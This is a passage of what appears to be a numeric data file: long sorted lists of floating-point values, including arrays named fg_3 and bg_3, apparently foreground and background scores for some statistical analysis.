-5.15031174731268, -5.13724801369195, -5.13307999171822, -5.11070697893696, -5.10240145654282, -5.07286140986759, -5.02760949945728, 
-4.99389860645012, -4.99228153882051, -4.99158560578963, -4.98205158522702, -4.96403610389916, -4.96328578973434, -4.94830439636911, -4.93906291736347, -4.92474749895853, -4.92445006776066, -4.89244047976311, -4.88765714056338, -4.88446663436502, -4.85908698649547, -4.85596846974296, -4.85301720947498, -4.84994872577491, -4.82468714549179, -4.82093054094259, -4.81719423395266, -4.79960585993681, -4.79450958271145, -4.77593074310967, -4.76841931287922, -4.76152297009406, -4.73846761455964, -4.73556791826794, -4.7185781141044, -4.712204905786, -4.7085871626959, -4.65837612363627, -4.65427993822297, -4.64096368709234, -4.63976609134064, -4.63606798349776, -4.62230545208703, -4.61119941428037, -4.6101644135773, -4.60505070674488, -4.60216228476108, -4.56137108384481, -4.55919537628411, -4.55335737628244, -4.55119618911966, -4.54980192690798, -4.54762237714311, -4.54188476930851, -4.53663518485849, -4.53058010718047, -4.51933985531769, -4.48348483127313, -4.4789489171353, -4.47394478794731, -4.46774231867997, -4.44509259526265, -4.44393091915643, -4.41519434826907, -4.40567579039357, -4.38984168168106, -4.38016997298702, -4.35618957798525, -4.35084831820702, -4.35027464418738, -4.34908071042421, -4.32140309049286, -4.3026983120069, -4.28127018096359, -4.26972319433717, -4.26279848868902, -4.25560959729774, -4.25373930341165, -4.23797385436194, -4.23669738961331, -4.22149916876285, -4.18723301641402, -4.18190189283134, -4.18100834652305, -4.16968343025405, -4.14868010962359, -4.14457377659363, -4.14239705929054, -4.14047669165511, -4.11415349374522, -4.11135553123405, -4.10575170887277, -4.09232563163418, -4.09001981140879, -4.08683323132099, -4.06467422195542, -4.06015133811765, -4.05869532969368, -4.04635050515043, -4.03120132024633, -4.01617685055156, -3.96666702360362, -3.96111826986238, -3.96088412029899, -3.92779757574645, -3.92663168005016, -3.91628868482989, -3.90326485061218, -3.8902413394591, -3.88856013085311, -3.88853056225145, -3.88646320176686, 
-3.86721023073069, -3.86668849343774, -3.86148832472908, -3.86053574623235, -3.86008300380152, -3.83684112266378, -3.83282840214479, -3.81732132568477, -3.78993550268502, -3.78016445091877, -3.77412655275942, -3.77249249109146, -3.74057457477842, -3.73755650219373, -3.73226395329731, -3.72386617201012, -3.72021562121906, -3.71898137800479, -3.71465105176757, -3.70112389718105, -3.6727357100468, -3.65198571605545, -3.64391833103247, -3.6297016692636, -3.62810333515983, -3.608608201615, -3.58299251896378, -3.5821486739471, -3.57436950378065, -3.57244462966279, -3.56929711128091, -3.56414715368633, -3.5465551444108, -3.54574405303921, -3.54378507078218, -3.54374843954636, -3.53627979821756, -3.53243955993852, -3.5291363433243, -3.52643657837631, -3.52506369870443, -3.51789646877019, -3.51576723748925, -3.50927661941198, -3.50798217407424, -3.48539377978139, -3.47420239243753, -3.46141463323791, -3.46024518051199, -3.45973890216053, -3.45875555338156, -3.41725292690291, -3.41497199034076, -3.41104150037547, -3.39358717592219, -3.39213960981569, -3.38745902791139, -3.38348051871965, -3.37430019897601, -3.36031348867417, -3.34441155395612, -3.34229004818493, -3.32998660406781, -3.31605346212567, -3.30959669083528, -3.30698486763005, -3.30236924631106, -3.29820033833118, -3.29401239991304, -3.29346112379973, -3.29070668028697, -3.28648843706492, -3.27989558333408, -3.27691418241743, -3.27200608439279, -3.27058992995483, -3.26573893978849, -3.25113134851702, -3.24546302689538, -3.24467195487936, -3.23935453458173, -3.23110167819537, -3.2238276633626, -3.21674202072185, -3.20865216914659, -3.19892803116475, -3.18854086902297, -3.18423974989327, -3.18265949423004, -3.16870357712785, -3.16532353749055, -3.15622209295322, -3.1552324492251, -3.15395372424389, -3.15118990810437, -3.13021741861799, -3.12559133401462, -3.11240135367784, -3.11217628549985, -3.10828152469296, -3.10533515880712, -3.10308704679552, -3.09299592894098, -3.09093642543836, -3.09079988688351, 
-3.08997117150615, -3.07307851860216, -3.07210350144952, -3.06415790295611, -3.05788627034772, -3.05162979971371, -3.05078244282525, -3.05043285501393, -3.04950378251821, -3.0392394168758, -3.03511181367061, -3.0349059504027, -3.02833441418166, -3.025363962075, -3.01031424112599, -2.99641559568854, -2.98536912788274, -2.98489702593985, -2.98008594073884, -2.97765479033361, -2.97339459676949, -2.97027828134747, -2.96776098678398, -2.96512122723563, -2.96421529567905, -2.96251814148259, -2.95549465020861, -2.95408873676075, -2.95281226047047, -2.9344291340757, -2.93432434536786, -2.93002562218533, -2.92900680356523, -2.92694516038843, -2.92587242998372, -2.92503107366644, -2.92065571663921, -2.9110643721586, -2.89443532386475, -2.89442844994519, -2.86978685645832, -2.85943837208249, -2.85387228779441, -2.83373560028208, -2.83254376531638, -2.82702383493164, -2.82083700652804, -2.81850808228868, -2.80867573129957, -2.80781001620288, -2.80048681845322, -2.80032756014568, -2.79741968162439, -2.79596140349676, -2.78506132231634, -2.78284483026523, -2.7800802743299, -2.77780812004533, -2.76859332955662, -2.76224188325119, -2.74638852169022, -2.74189460920298, -2.74176761117359, -2.73705167951016, -2.73572136828971, -2.72884879914086, -2.72804003474724, -2.72802748955124, -2.72121307897118, -2.71132694596897, -2.7106737455993, -2.69221752992228, -2.6858838877386, -2.67936620209641, -2.67742461607703, -2.67522471223764, -2.67468122321351, -2.66706478775549, -2.66542815683533, -2.6638899973071, -2.6591427901747, -2.65449278371109, -2.6498856835267, -2.6468478815723, -2.64132067622366, -2.62703509095644, -2.62600762120414, -2.6255669632796, -2.62543650333752, -2.6248465982971, -2.62479477935021, -2.62156069698757, -2.6196490309563, -2.6189845962678, -2.61734717079125, -2.61395378406467, -2.60130128799689, -2.59894719086357, -2.59803358347537, -2.59268243788184, -2.5881980630896, -2.58650578537472, -2.58323535214077, -2.57377538537865, -2.56855584008607, -2.56732158394214, 
-2.5620420166921, -2.56155766302635, -2.55893433096706, -2.54877246832393, -2.54620547834289, -2.53769881863222, -2.52879229374978, -2.52689232596764, -2.5222870603308, -2.51900276142976, -2.50285674743039, -2.50031889131413, -2.4949158812924, -2.49139711942209, -2.48812939258639, -2.48383568506359, -2.47998929963482, -2.47588659071293, -2.47212391684667, -2.46868127491303, -2.4666390582227, -2.46268553769944, -2.45542879893428, -2.45313080031999, -2.45058338417446, -2.43997330504517, -2.4388147705156, -2.43675681357139, -2.43362585935822, -2.4320543755034, -2.43034015973118, -2.42975616820674, -2.4284167206258, -2.42840120325971, -2.42557735615568, -2.41752122107817, -2.41695562741707, -2.41469603158351, -2.40765091259847, -2.40099303490722, -2.39761029925005, -2.39143127517876, -2.38921730971439, -2.37354485968924, -2.37008913736568, -2.36907875332741, -2.36085587755146, -2.35541216581853, -2.35499775477767, -2.35483214155369, -2.35070694879604, -2.34524287183516, -2.34507119777619, -2.34349521897481, -2.33765735033273, -2.3302582533367, -2.32533368220489, -2.3130760663946, -2.30834983167064, -2.30614355271168, -2.30436640666394, -2.2959493427459, -2.29560949598717, -2.29415492436455, -2.28988219699669, -2.27987657429476, -2.26747189590981, -2.26728600354136, -2.26217920539588, -2.25995201153298, -2.25868195286177, -2.24643023228834, -2.24419337219989, -2.22646753427998, -2.2248842157761, -2.21857327985432, -2.21673728593081, -2.21105867150559, -2.20860428693124, -2.20703342922843, -2.20663361700686, -2.20583784790456, -2.19848235739652, -2.19315969555728, -2.19199814376301, -2.19073833511308, -2.17433630908843, -2.17346520150056, -2.16156703827477, -2.16073137533335, -2.15399869414511, -2.15258549410078, -2.14925922904975, -2.14499668676072, -2.14446876519314, -2.13380114327829, -2.13157357686132, -2.13152501741489, -2.12564373875284, -2.12083939056405, -2.11616109041893, -2.11533374684416, -2.1153073664903, -2.10681104845128, -2.10574664635352, 
-2.10277015776226, -2.1012183024032, -2.1004697087009, -2.09468160013629, -2.09149244560058, -2.08205219304469, -2.07685709593545, -2.07345361601096, -2.07211556813827, -2.05252517024539, -2.04934610492274, -2.04871672377998, -2.04670854627056, -2.0400029596935, -2.03931378429032, -2.03808888829879, -2.03375667864032, -2.03072390622845, -2.02359300958761, -2.01988602190739, -2.01474367779591, -2.00669398273574, -2.00354457486203, -1.99369290915384, -1.99024871387742, -1.98445859115386, -1.9821294855594, -1.97924778860837, -1.96692563333921, -1.96492470874042, -1.9644918223324, -1.96084409424985, -1.95320676156059, -1.93599010446892, -1.93441506584989, -1.9336134502564, -1.92805935288047, -1.9280244354887, -1.91901672737759, -1.91272578031586, -1.91150876386419, -1.90073423791214, -1.89957983020343, -1.88765495072017, -1.88622428890795, -1.88608611875168, -1.88531486347853, -1.87717273864848, -1.87658305870155, -1.87549862121653, -1.87073425916746, -1.86981225704331, -1.86872330459009, -1.86639491917143, -1.86529601002448, -1.86103342961632, -1.85776566863776, -1.84885822239558, -1.84457033937804, -1.84133858785801, -1.83923593052807, -1.83372921246915, -1.82417848446868, -1.82095539634476, -1.81888404766071, -1.81299618469462, -1.80668342478886, -1.80258262438383, -1.79870864312059, -1.79617739391335, -1.79598032193387, -1.79344908452896, -1.79246569229923, -1.79032319641819, -1.78872160656364, -1.78542927907352, -1.78492531186077, -1.78444022854041, -1.78298712630417, -1.78257525222681, -1.78066956692608, -1.77724586121844, -1.77603743244057, -1.77497437252417, -1.76432868130879, -1.76430636567513, -1.75838803509438, -1.75353711286565, -1.75307104343078, -1.75186748297339, -1.75169097375475, -1.74943505108089, -1.74866732133724, -1.7466271458849, -1.74620593433065, -1.74454422989634, -1.74449082726857, -1.73799975015413, -1.72817956395629, -1.72681720539307, -1.72553416973442, -1.7194947508813, -1.71809131961518, -1.71584421005811, -1.71459267042556, 
-1.71150902527557, -1.71142438616402, -1.70896476317588, -1.70724457088539, -1.7017517285505, -1.69998651599094, -1.69071358483784, -1.68920231264234, -1.68886993315355, -1.67714395258884, -1.66454274603339, -1.66290029197517, -1.65387857628297, -1.65242706346631, -1.65007686752239, -1.64979257195518, -1.64740574748032, -1.64478507070937, -1.63691527242944, -1.63541426577976, -1.6327064573579, -1.63265623866541, -1.63148041397343, -1.62971495288362, -1.62503259960895, -1.62280426560118, -1.61989195197603, -1.61039430903756, -1.60001928103155, -1.59717098280561, -1.59474711580785, -1.59455861619267, -1.59226994066529, -1.58219629028104, -1.58050160213268, -1.57554015279906, -1.57507155306422, -1.5732595618904, -1.571786907985, -1.56617034525202, -1.5630080754445, -1.55512318728101, -1.55174935433394, -1.54963968438918, -1.53477639911934, -1.53247120433308, -1.53241289360217, -1.53206025842873, -1.53014869245035, -1.5255748391867, -1.52499561770544, -1.52149753136422, -1.51907576624032, -1.51788004125355, -1.50196896772363, -1.49754270499549, -1.49752942111276, -1.49314621137239, -1.48357161450625, -1.47396214308553, -1.47087249010024, -1.46898302979973, -1.46611547540387, -1.46500561776518, -1.45595699028627, -1.45490778922291, -1.44350058978854, -1.44089317066432, -1.43555137796401, -1.42790013474591, -1.42177423917028, -1.41703537765471, -1.41404386184681, -1.40567571616606, -1.3993016143028, -1.39744741025476, -1.39650055236661, -1.38821615675844, -1.37981917491177, -1.34453217829785, -1.33543223554228, -1.32748620572223, -1.32619807482176, -1.32256908092003, -1.32086656554565, -1.31093958956234, -1.30612644055616, -1.30218378750615, -1.292390189237, -1.28624821180639, -1.2837370442399, -1.26135848707404, -1.26076130475925, -1.25880691794561, -1.25144698413725, -1.25040616920522, -1.24795259106321, -1.24462610121405, -1.23520396459594, -1.23258565931548, -1.23214383189408, -1.20420769047093, -1.19115956516894, -1.18850141299861, -1.18784132944629, 
-1.18312197985725, -1.18141103239185, -1.17198667518472, -1.1574473884479, -1.15547302875988, -1.15436184512092, -1.1492782786143, -1.14512772755633, -1.13333472235356, -1.13144201628438, -1.12758436826972, -1.1275262270534, -1.11604170754024, -1.11196663676282, -1.10653838735955, -1.10355835173696, -1.09426621454289, -1.08902293323313, -1.08230964724019, -1.08189678878143, -1.06947177159841, -1.06246750400604, -1.0507235919501, -1.04238716875262, -1.04002845756691, -1.03776283558259, -1.03100089406809, -1.02715039124769, -1.02482140105725, -1.01632881790586, -1.01264478082765, -1.00648174964558, -1.00572341041694, -0.995472313986702, -0.99256485331236, -0.988580000017022, -0.957848063220885, -0.93283578520007, -0.924828866057543, -0.921065089580478, -0.90090746786517, -0.880837749577085, -0.85245992296553, -0.847329067619522, -0.827499774943424, -0.825478162495361, -0.823005326357598, -0.820833134567771, -0.770283884793913, -0.72387440044806, -0.711615267900462, -0.689885884022624, -0.689530886654175, -0.657472831578137, -0.642788428086676, -0.607595078923237, -0.591722161954329, -0.492097069045875, -0.489076513247852, -0.477558238091107, -0.428102620439042, -0.338629448431751, -0.326670211958466, -0.324378464023917, -0.298708415917137, -0.209655625601901, -0.129565619268835, 0.0459296900675103, 0.138587255889901, 0.167122788074793, 0.250164879103255, 0.38805696412105, 0.388117026693325, 0.388226676241142, 0.46114992999589, 0.477397967012959, 0.515148585239905, 0.554924814842295, 0.563932128443976, 0.631964260977664, 0.653223377815047, 0.667694845910074, 0.710098342595984, 0.713170713096676, 0.717989916797078, 0.738811457761873, 0.739235071658754, 0.741557291838533, 0.743043353195949, 0.764158303808917, 0.785388077706216, 0.801267672769671, 0.805025125412237, 0.814814353247987, 0.819279873236768, 0.828760315586074, 0.841718725297425, 0.870852520173949, 0.885189968127755, 0.89381721250527, 0.909470630874892, 0.910520758770315, 0.917015818930873, 0.927323175823553, 
0.938036977604359, 0.943106311822479, 0.946348078874905, 0.954635466126727, 0.960191098886339, 0.969856620706237, 0.983343741059723, 0.989355372568323, 0.992604751345429, 0.999630859191061, 1.00192707606825, 1.0091056926022, 1.00913072142497, 1.01400653547193, 1.0451369882041, 1.04720960248872, 1.04848874296014, 1.05206912241713, 1.06840533126208, 1.07177222565555, 1.07765601331905, 1.10044306508489, 1.14521855910075, 1.14721025372615, 1.15117176566609, 1.15368418944538, 1.17365742844115, 1.18232596918433, 1.20252852661979, 1.20690250131736, 1.21028709095634, 1.21334406479577, 1.21732093182956, 1.21801680712667, 1.22436923497591, 1.23329981994489, 1.25977675993613, 1.27576186496016, 1.28173932980657, 1.29279270197421, 1.29807749565535, 1.31514427140457, 1.32277216941972, 1.32309098256522, 1.33327008571054, 1.33832806064235, 1.34075883200151, 1.35250997801875, 1.3539830942859, 1.35850407702677, 1.36778649133896, 1.36862462149624, 1.37363355429464, 1.37484067333569, 1.38754529273882, 1.38872814665393, 1.39558125510676, 1.40814588149176, 1.44557822484993, 1.47530752297389, 1.48156311994824, 1.48401985822081, 1.49274700696083, 1.50033361885617, 1.50091286445433, 1.50346960183587, 1.50558135644419, 1.5274697562299, 1.53155647907915, 1.53603694612939, 1.54847718136891, 1.56878532698145, 1.57310643991257, 1.62162603796759, 1.62724662946682, 1.6311703892394, 1.63278022906532, 1.63286277246058, 1.6390052219977, 1.64216618713934, 1.64774594814051, 1.65108720634525, 1.65419548542931, 1.65507482456591, 1.65686713620059, 1.66119216987342, 1.66324387968644, 1.69538281930072, 1.69943010687876, 1.71835249991339, 1.72218624392784, 1.72665629108124, 1.7305415588152, 1.74247528855006, 1.75904901577023, 1.76789095742535, 1.77612709066103, 1.78511430654618, 1.79136198982229, 1.82142296458901, 1.82427659994177, 1.83141481960834, 1.83407792478098, 1.83507741652202, 1.84156822274656, 1.84604908108617, 1.85206282259832, 1.85501897137491, 1.85514726519441, 1.8725780583658, 1.8733110072085, 
1.87702099485335, 1.8819786568054, 1.88653634536034, 1.88852330644768, 1.8922043980357, 1.92516259478729, 1.94267291353469, 1.98582750997238, 1.99285206337604, 1.99651440482193, 2.01260608164314, 2.01988206381339, 2.02654826883426, 2.03618133832892, 2.03962302659235, 2.0693423850561, 2.06986023383023, 2.07015511787096, 2.07981650099165, 2.09031096027266, 2.09794235989014, 2.10257313307331, 2.10283684013321, 2.11076677079529, 2.11345884319228, 2.11997846567281, 2.13480219730788, 2.13849594322748, 2.14014159423894, 2.14179613678729, 2.14546007755766, 2.15640334005494, 2.16179414876137, 2.18403438846943, 2.19811639987397, 2.20619657334253, 2.21422460341567, 2.21452378213307, 2.21627902918735, 2.22041612115193, 2.22517013985275, 2.22755164471054, 2.23416748291575, 2.24069215171696, 2.24153000593021, 2.25022483167014, 2.27827647213403, 2.28982723339836, 2.29243374383072, 2.30501805850302, 2.32158720203675, 2.32176742483064, 2.32178739485438, 2.331543058417, 2.3484316133167, 2.36610293793904, 2.36776511631972, 2.37491717417071, 2.37590849297063, 2.38261363024158, 2.44474259928041, 2.45065300086489, 2.45153772275136, 2.47214468657032, 2.53382334332036, 2.54913699632984, 2.56931454383761, 2.57045306287182, 2.57214556418502, 2.58536599752475, 2.58601242708292, 2.59658440428213, 2.60519113174386, 2.63014087680095, 2.64564991719137, 2.67922294868574, 2.69094444201124, 2.69378604148733, 2.70156045632584, 2.71355896020348, 2.72846673795643, 2.73273068190486, 2.74053944561202, 2.75646951941922, 2.77919130707459, 2.83037773693719, 2.85396841128117, 2.87189699646583, 2.87445930157727, 2.90438045626719, 2.90648625657812, 2.91629826551014, 2.92062296024744, 2.93240975984361, 2.95461889311079, 2.99659804937327, 3.00644546362766, 3.0401219204868, 3.10479018806494, 3.13048800094528, 3.13187383863909, 3.20422879636909, 3.21606576156584, 3.24892400229704, 3.46836466129959, 3.5775741166786, 3.58707758359076, 3.64691463194454, 3.67382885933952, 3.68153339403736, 3.7023603699075, 
3.74797284255835, 3.76800916543556, 3.84570423193084, 4.01723852946342, 4.06951125405614, 4.11724952712395, 4.12817984248988, 4.20874721492816, 4.32576917599121, 4.63994743989415, 4.78808672479767, 4.8547560668931, 5.63873268099544]
fg_3 = [-5.3018475947231, -5.93251599928652, -5.89125543330919, -4.62230545208703, -4.99389860645012, -2.35541216581853, -6.13426879717682, -6.36076969181797, -3.11240135367784, -4.04635050515043, -1.26076130475925, -4.89244047976311, -6.86645118823921, -6.25317971847765, -2.6591427901747, -5.13307999171822]
bg_3 = [-8.32643470076795, -8.12926078021377, -8.06480495716629, -7.91650311880841, -7.83801246222857, -7.70583778501837, -7.52738966855758, -7.49777367765364, -7.46651942330827, -7.42355926825873, -7.30100855923803, -7.26350122359286, -7.19468100328791, -7.13961252138971, -7.05545005462474, -7.03430813260908, -7.03089483430696, -7.02251373739152, -6.86645118823921, -6.85898908383128, -6.84855344412137, -6.76730879143088, -6.7664972463577, -6.69533136777946, -6.61277822936154, -6.58502157909065, -6.57284941377777, -6.48626842620612, -6.45986392537447, -6.441174858703, -6.41827521708809, -6.38452118966051, -6.36363468782975, -6.36076969181797, -6.26240701383164, -6.25317971847765, -6.2365389484951, -6.15648608681838, -6.15346814841415, -6.13426879717682, -6.08299484961717, -6.07448195514896, -6.07291813132705, -5.99612353985798, -5.98325289595672, -5.97435574341204, -5.95224905793447, -5.94667848489343, -5.9334583297072, -5.93251599928652, -5.89242499010306, -5.89125543330919, -5.87878829845967, -5.87466394085314, -5.8294477431172, -5.80105853438803, -5.77627544673249, -5.77570752439622, -5.77316736458519, -5.77104152357156, -5.73460384423021, -5.73224218231378, -5.71982626290828, -5.70008179669666, -5.69996938749922, -5.68781951940129, -5.64240743669934, -5.62788710170745, -5.60912454884795, -5.60733066321827, -5.58805534802067, -5.58482481806554, -5.5794352703236, -5.53619100793383, -5.5266917671331, -5.5013015283131, -5.49985868979162, -5.48514216653179, -5.47736351108885, -5.44794192762878, -5.44554285489525, -5.43436122520384, -5.43024773291195, -5.37874070417799, -5.37704368474112, -5.35464917492812, -5.34442189805867, -5.33991419491576, -5.32868519351564, -5.31778213754401, -5.30306045586955, -5.3018475947231, -5.30091946696228, -5.25002227237239, -5.20584852774195, -5.20379059906394, -5.17743188426567, -5.16932479991793, -5.15031174731268, -5.13724801369195, -5.13307999171822, -5.11070697893696, -5.10240145654282, -5.07286140986759, -5.02760949945728, 
-4.99389860645012, -4.99228153882051, -4.99158560578963, -4.98205158522702, -4.96403610389916, -4.96328578973434, -4.94830439636911, -4.93906291736347, -4.92474749895853, -4.92445006776066, -4.89244047976311, -4.88765714056338, -4.88446663436502, -4.85908698649547, -4.85596846974296, -4.85301720947498, -4.84994872577491, -4.82468714549179, -4.82093054094259, -4.81719423395266, -4.79960585993681, -4.79450958271145, -4.77593074310967, -4.76841931287922, -4.76152297009406, -4.73846761455964, -4.73556791826794, -4.7185781141044, -4.712204905786, -4.7085871626959, -4.65837612363627, -4.65427993822297, -4.64096368709234, -4.63976609134064, -4.63606798349776, -4.62230545208703, -4.61119941428037, -4.6101644135773, -4.60505070674488, -4.60216228476108, -4.56137108384481, -4.55919537628411, -4.55335737628244, -4.55119618911966, -4.54980192690798, -4.54762237714311, -4.54188476930851, -4.53663518485849, -4.53058010718047, -4.51933985531769, -4.48348483127313, -4.4789489171353, -4.47394478794731, -4.46774231867997, -4.44509259526265, -4.44393091915643, -4.41519434826907, -4.40567579039357, -4.38984168168106, -4.38016997298702, -4.35618957798525, -4.35084831820702, -4.35027464418738, -4.34908071042421, -4.32140309049286, -4.3026983120069, -4.28127018096359, -4.26972319433717, -4.26279848868902, -4.25560959729774, -4.25373930341165, -4.23797385436194, -4.23669738961331, -4.22149916876285, -4.18723301641402, -4.18190189283134, -4.18100834652305, -4.16968343025405, -4.14868010962359, -4.14457377659363, -4.14239705929054, -4.14047669165511, -4.11415349374522, -4.11135553123405, -4.10575170887277, -4.09232563163418, -4.09001981140879, -4.08683323132099, -4.06467422195542, -4.06015133811765, -4.05869532969368, -4.04635050515043, -4.03120132024633, -4.01617685055156, -3.96666702360362, -3.96111826986238, -3.96088412029899, -3.92779757574645, -3.92663168005016, -3.91628868482989, -3.90326485061218, -3.8902413394591, -3.88856013085311, -3.88853056225145, -3.88646320176686, 
-3.86721023073069, -3.86668849343774, -3.86148832472908, -3.86053574623235, -3.86008300380152, -3.83684112266378, -3.83282840214479, -3.81732132568477, -3.78993550268502, -3.78016445091877, -3.77412655275942, -3.77249249109146, -3.74057457477842, -3.73755650219373, -3.73226395329731, -3.72386617201012, -3.72021562121906, -3.71898137800479, -3.71465105176757, -3.70112389718105, -3.6727357100468, -3.65198571605545, -3.64391833103247, -3.6297016692636, -3.62810333515983, -3.608608201615, -3.58299251896378, -3.5821486739471, -3.57436950378065, -3.57244462966279, -3.56929711128091, -3.56414715368633, -3.5465551444108, -3.54574405303921, -3.54378507078218, -3.54374843954636, -3.53627979821756, -3.53243955993852, -3.5291363433243, -3.52643657837631, -3.52506369870443, -3.51789646877019, -3.51576723748925, -3.50927661941198, -3.50798217407424, -3.48539377978139, -3.47420239243753, -3.46141463323791, -3.46024518051199, -3.45973890216053, -3.45875555338156, -3.41725292690291, -3.41497199034076, -3.41104150037547, -3.39358717592219, -3.39213960981569, -3.38745902791139, -3.38348051871965, -3.37430019897601, -3.36031348867417, -3.34441155395612, -3.34229004818493, -3.32998660406781, -3.31605346212567, -3.30959669083528, -3.30698486763005, -3.30236924631106, -3.29820033833118, -3.29401239991304, -3.29346112379973, -3.29070668028697, -3.28648843706492, -3.27989558333408, -3.27691418241743, -3.27200608439279, -3.27058992995483, -3.26573893978849, -3.25113134851702, -3.24546302689538, -3.24467195487936, -3.23935453458173, -3.23110167819537, -3.2238276633626, -3.21674202072185, -3.20865216914659, -3.19892803116475, -3.18854086902297, -3.18423974989327, -3.18265949423004, -3.16870357712785, -3.16532353749055, -3.15622209295322, -3.1552324492251, -3.15395372424389, -3.15118990810437, -3.13021741861799, -3.12559133401462, -3.11240135367784, -3.11217628549985, -3.10828152469296, -3.10533515880712, -3.10308704679552, -3.09299592894098, -3.09093642543836, -3.09079988688351, 
-3.08997117150615, -3.07307851860216, -3.07210350144952, -3.06415790295611, -3.05788627034772, -3.05162979971371, -3.05078244282525, -3.05043285501393, -3.04950378251821, -3.0392394168758, -3.03511181367061, -3.0349059504027, -3.02833441418166, -3.025363962075, -3.01031424112599, -2.99641559568854, -2.98536912788274, -2.98489702593985, -2.98008594073884, -2.97765479033361, -2.97339459676949, -2.97027828134747, -2.96776098678398, -2.96512122723563, -2.96421529567905, -2.96251814148259, -2.95549465020861, -2.95408873676075, -2.95281226047047, -2.9344291340757, -2.93432434536786, -2.93002562218533, -2.92900680356523, -2.92694516038843, -2.92587242998372, -2.92503107366644, -2.92065571663921, -2.9110643721586, -2.89443532386475, -2.89442844994519, -2.86978685645832, -2.85943837208249, -2.85387228779441, -2.83373560028208, -2.83254376531638, -2.82702383493164, -2.82083700652804, -2.81850808228868, -2.80867573129957, -2.80781001620288, -2.80048681845322, -2.80032756014568, -2.79741968162439, -2.79596140349676, -2.78506132231634, -2.78284483026523, -2.7800802743299, -2.77780812004533, -2.76859332955662, -2.76224188325119, -2.74638852169022, -2.74189460920298, -2.74176761117359, -2.73705167951016, -2.73572136828971, -2.72884879914086, -2.72804003474724, -2.72802748955124, -2.72121307897118, -2.71132694596897, -2.7106737455993, -2.69221752992228, -2.6858838877386, -2.67936620209641, -2.67742461607703, -2.67522471223764, -2.67468122321351, -2.66706478775549, -2.66542815683533, -2.6638899973071, -2.6591427901747, -2.65449278371109, -2.6498856835267, -2.6468478815723, -2.64132067622366, -2.62703509095644, -2.62600762120414, -2.6255669632796, -2.62543650333752, -2.6248465982971, -2.62479477935021, -2.62156069698757, -2.6196490309563, -2.6189845962678, -2.61734717079125, -2.61395378406467, -2.60130128799689, -2.59894719086357, -2.59803358347537, -2.59268243788184, -2.5881980630896, -2.58650578537472, -2.58323535214077, -2.57377538537865, -2.56855584008607, -2.56732158394214, 
-2.5620420166921, -2.56155766302635, -2.55893433096706, -2.54877246832393, -2.54620547834289, -2.53769881863222, -2.52879229374978, -2.52689232596764, -2.5222870603308, -2.51900276142976, -2.50285674743039, -2.50031889131413, -2.4949158812924, -2.49139711942209, -2.48812939258639, -2.48383568506359, -2.47998929963482, -2.47588659071293, -2.47212391684667, -2.46868127491303, -2.4666390582227, -2.46268553769944, -2.45542879893428, -2.45313080031999, -2.45058338417446, -2.43997330504517, -2.4388147705156, -2.43675681357139, -2.43362585935822, -2.4320543755034, -2.43034015973118, -2.42975616820674, -2.4284167206258, -2.42840120325971, -2.42557735615568, -2.41752122107817, -2.41695562741707, -2.41469603158351, -2.40765091259847, -2.40099303490722, -2.39761029925005, -2.39143127517876, -2.38921730971439, -2.37354485968924, -2.37008913736568, -2.36907875332741, -2.36085587755146, -2.35541216581853, -2.35499775477767, -2.35483214155369, -2.35070694879604, -2.34524287183516, -2.34507119777619, -2.34349521897481, -2.33765735033273, -2.3302582533367, -2.32533368220489, -2.3130760663946, -2.30834983167064, -2.30614355271168, -2.30436640666394, -2.2959493427459, -2.29560949598717, -2.29415492436455, -2.28988219699669, -2.27987657429476, -2.26747189590981, -2.26728600354136, -2.26217920539588, -2.25995201153298, -2.25868195286177, -2.24643023228834, -2.24419337219989, -2.22646753427998, -2.2248842157761, -2.21857327985432, -2.21673728593081, -2.21105867150559, -2.20860428693124, -2.20703342922843, -2.20663361700686, -2.20583784790456, -2.19848235739652, -2.19315969555728, -2.19199814376301, -2.19073833511308, -2.17433630908843, -2.17346520150056, -2.16156703827477, -2.16073137533335, -2.15399869414511, -2.15258549410078, -2.14925922904975, -2.14499668676072, -2.14446876519314, -2.13380114327829, -2.13157357686132, -2.13152501741489, -2.12564373875284, -2.12083939056405, -2.11616109041893, -2.11533374684416, -2.1153073664903, -2.10681104845128, -2.10574664635352, 
-2.10277015776226, -2.1012183024032, -2.1004697087009, -2.09468160013629, -2.09149244560058, -2.08205219304469, -2.07685709593545, -2.07345361601096, -2.07211556813827, -2.05252517024539, -2.04934610492274, -2.04871672377998, -2.04670854627056, -2.0400029596935, -2.03931378429032, -2.03808888829879, -2.03375667864032, -2.03072390622845, -2.02359300958761, -2.01988602190739, -2.01474367779591, -2.00669398273574, -2.00354457486203, -1.99369290915384, -1.99024871387742, -1.98445859115386, -1.9821294855594, -1.97924778860837, -1.96692563333921, -1.96492470874042, -1.9644918223324, -1.96084409424985, -1.95320676156059, -1.93599010446892, -1.93441506584989, -1.9336134502564, -1.92805935288047, -1.9280244354887, -1.91901672737759, -1.91272578031586, -1.91150876386419, -1.90073423791214, -1.89957983020343, -1.88765495072017, -1.88622428890795, -1.88608611875168, -1.88531486347853, -1.87717273864848, -1.87658305870155, -1.87549862121653, -1.87073425916746, -1.86981225704331, -1.86872330459009, -1.86639491917143, -1.86529601002448, -1.86103342961632, -1.85776566863776, -1.84885822239558, -1.84457033937804, -1.84133858785801, -1.83923593052807, -1.83372921246915, -1.82417848446868, -1.82095539634476, -1.81888404766071, -1.81299618469462, -1.80668342478886, -1.80258262438383, -1.79870864312059, -1.79617739391335, -1.79598032193387, -1.79344908452896, -1.79246569229923, -1.79032319641819, -1.78872160656364, -1.78542927907352, -1.78492531186077, -1.78444022854041, -1.78298712630417, -1.78257525222681, -1.78066956692608, -1.77724586121844, -1.77603743244057, -1.77497437252417, -1.76432868130879, -1.76430636567513, -1.75838803509438, -1.75353711286565, -1.75307104343078, -1.75186748297339, -1.75169097375475, -1.74943505108089, -1.74866732133724, -1.7466271458849, -1.74620593433065, -1.74454422989634, -1.74449082726857, -1.73799975015413, -1.72817956395629, -1.72681720539307, -1.72553416973442, -1.7194947508813, -1.71809131961518, -1.71584421005811, -1.71459267042556, 
